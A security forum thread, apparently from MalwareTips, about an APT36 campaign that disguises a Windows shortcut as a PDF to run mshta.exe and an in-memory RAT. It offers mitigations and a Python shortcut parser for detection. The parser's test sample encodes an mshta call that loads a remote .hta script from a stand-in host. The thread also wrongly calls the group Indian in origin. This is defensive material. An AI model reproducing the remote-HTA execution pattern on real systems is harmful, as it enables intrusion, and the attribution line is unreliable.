Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

Captain Awesome

Thread author
The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts.

"The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion," CYFIRMA said in a technical report.

Transparent Tribe, also called APT36, is a hacking group that's known for mounting cyber espionage campaigns against Indian organizations. Assessed to be of Indian origin, the state-sponsored adversary has been active since at least 2013.

The threat actor boasts of an ever-evolving arsenal of RATs to realize its goals. Some of the trojans put to use by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.

The latest set of attacks began with a spear-phishing email containing a ZIP archive with a LNK file disguised as a PDF. Opening the file triggers the execution of a remote HTML Application (HTA) script using "mshta.exe" that decrypts and loads the final RAT payload directly in memory. In tandem, the HTA downloads and opens a decoy PDF document so as not to arouse users' suspicion.
 
This write-up describes a fairly common (and effective) APT tradecraft chain: LNK → mshta.exe → decrypted in-memory RAT + decoy PDF. The key point is that the “PDF” the user thinks they opened is actually a Windows shortcut, and the real payload is staged through script execution and memory-loading to reduce obvious on-disk artifacts.

What’s happening (high level)
  • Initial lure: Spear-phishing email delivers a ZIP containing an .LNK that visually mimics a PDF (icon/name).
  • Execution: The LNK launches mshta.exe to run a remote or dropped .HTA (HTML Application).
  • Staging: The HTA decrypts/loads the RAT in memory (often to evade simple file-based scanning).
  • Distraction: A decoy PDF is opened to make the user think nothing suspicious happened.
  • Outcome: A RAT typically provides persistence + remote control (process execution, file access, credential/data theft depending on the family).

Why this is important defensively
  • LNK files are “low friction” for users (double-clickable) and can hide their true behavior.
  • mshta.exe is a legitimate Windows binary often abused as a “LOLBIN” (living-off-the-land) to run script-based payloads.
  • In-memory loading can reduce the number of obvious malware files left behind, increasing reliance on behavior/telemetry detections.

Practical mitigations (Windows / enterprise-friendly)
  • Block or heavily restrict mshta.exe where possible (AppLocker/WDAC). If you can’t block it outright, alert on it and restrict outbound network access for it.
  • Enable Microsoft Defender Attack Surface Reduction (ASR) rules (especially rules that block Office from creating child processes, block executable content from email/web, and block suspicious scripting behaviors). Test in audit first if needed.
  • Mark-of-the-Web (MOTW) enforcement: Ensure downloads retain MOTW so Windows/Defender/SmartScreen apply stricter checks to files from the internet (including archives where applicable).
  • Email gateway controls: Quarantine or strip ZIP attachments containing LNK/HTA (and consider blocking HTA outright at the mail perimeter).
  • User-facing hardening: Show full file extensions in Explorer and train users that “PDF” files should be .pdf, not .lnk (attackers rely on hidden extensions).
  • Monitoring: Alert on process chains like explorer.exe → mshta.exe, mshta reaching external URLs, and unusual child processes spawned shortly after.

If someone already opened a suspected LNK
  • Disconnect the machine from the network (or at least isolate it) to reduce potential C2 activity.
  • Do not continue opening/“testing” the file.
  • Collect basics: the ZIP/LNK sample, email headers, and relevant endpoint telemetry (Defender logs, EDR events, process tree).
  • Submit the sample to VirusTotal (if policy allows) and/or your internal sandbox, and share hashes/IOCs with your SOC.
  • If you want forum help, post in the appropriate MalwareTips malware removal/help section with the requested logs (FRST logs are commonly used here) and avoid posting sensitive documents publicly.

Key takeaway
Treat LNK-in-ZIP + mshta/HTA as a high-risk phishing pattern. The safest path is to prevent execution (blocking/restricting mshta and risky attachment types) and to rely on behavioral detection/telemetry rather than expecting a clean on-disk payload to be easy to find.
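The LNK-disguised-as-PDF chain from the article and the "show file extensions" / process-chain advice in the post above, as an added triage example that is not from the thread or from CYFIRMA: a minimal Python parser for the StringData fields of a Windows Shell Link (MS-SHLLINK header layout) plus heuristics that flag a shortcut named like a PDF whose target or arguments reference mshta.exe or a remote .hta. The sample bytes, the file name and the example.invalid URL are constructed placeholders, not a real artefact.

```python
import struct

# LinkFlags bits and the ShellLink CLSID from the MS-SHLLINK specification
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk: enough to see what it would launch."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                    # skip LinkTargetIDList (2-byte size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # skip LinkInfo (its size field includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if flags & bit:                        # each string: CountCharacters + chars, no NUL
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return fields


def lnk_risk(filename: str, fields: dict) -> list:
    """Heuristics mirroring the lure in the thread; returns the reasons a file looks suspicious."""
    reasons = []
    stem = filename.lower().rsplit(".", 1)[0]
    if filename.lower().endswith(".lnk") and "pdf" in stem:
        reasons.append("shortcut named like a PDF")
    launch = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    if "mshta" in launch:
        reasons.append("launches mshta.exe (LOLBIN)")
    if "http://" in launch or "https://" in launch or ".hta" in launch:
        reasons.append("references a remote or HTA script")
    if any(tag in fields.get("icon_location", "").lower() for tag in ("acro", "pdf")):
        reasons.append("borrows a PDF viewer icon")
    return reasons


def _string_data(s: str) -> bytes:
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


# Constructed sample: header (flags only, rest zeroed) + StringData; not a real malware file
SAMPLE_LNK = (struct.pack("<I", 0x4C) + LNK_CLSID
              + struct.pack("<I", HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE) + bytes(52)
              + _string_data("..\\..\\Windows\\System32\\mshta.exe")
              + _string_data("https://example.invalid/lure.hta")
              + _string_data("C:\\Program Files\\Adobe\\Acrobat.exe"))
```

Run `lnk_risk("Report.pdf.lnk", parse_lnk(SAMPLE_LNK))` to see all four heuristics fire on the sample; a clean document shortcut returns an empty list.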
 
If they have WHHL, the attack would not initiate in the first place.

If they do not have WHHL but read MT posts, they would select "show file extensions" in Windows Explorer, showing the .lnk extension of the file disguised as a PDF, and again the attack would not initiate.

We did not use any AV yet.
 